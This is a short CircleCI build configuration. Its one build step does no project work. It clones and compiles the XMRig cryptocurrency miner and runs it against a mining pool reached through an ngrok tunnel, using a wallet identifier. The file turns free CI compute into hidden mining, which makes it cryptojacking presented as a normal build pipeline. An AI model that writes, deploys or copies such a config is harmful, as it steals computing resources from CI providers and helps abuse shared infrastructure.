version: 2.1
jobs:
  build:
    docker:
      - image: ubuntu
    steps:
      - run: apt-get update && apt-get install wget -y && DEBIAN_FRONTEND="noninteractive" TZ="America/New_York" apt-get install -y tzdata && apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/build && cmake .. && make -j$(nproc) && ./xmrig -o 8.tcp.ngrok.io:15953 -u BTT:TRGnhHFiSb4256PzFSEBqEF34psbsT2NPN.gratisan#yl8x-tlrw
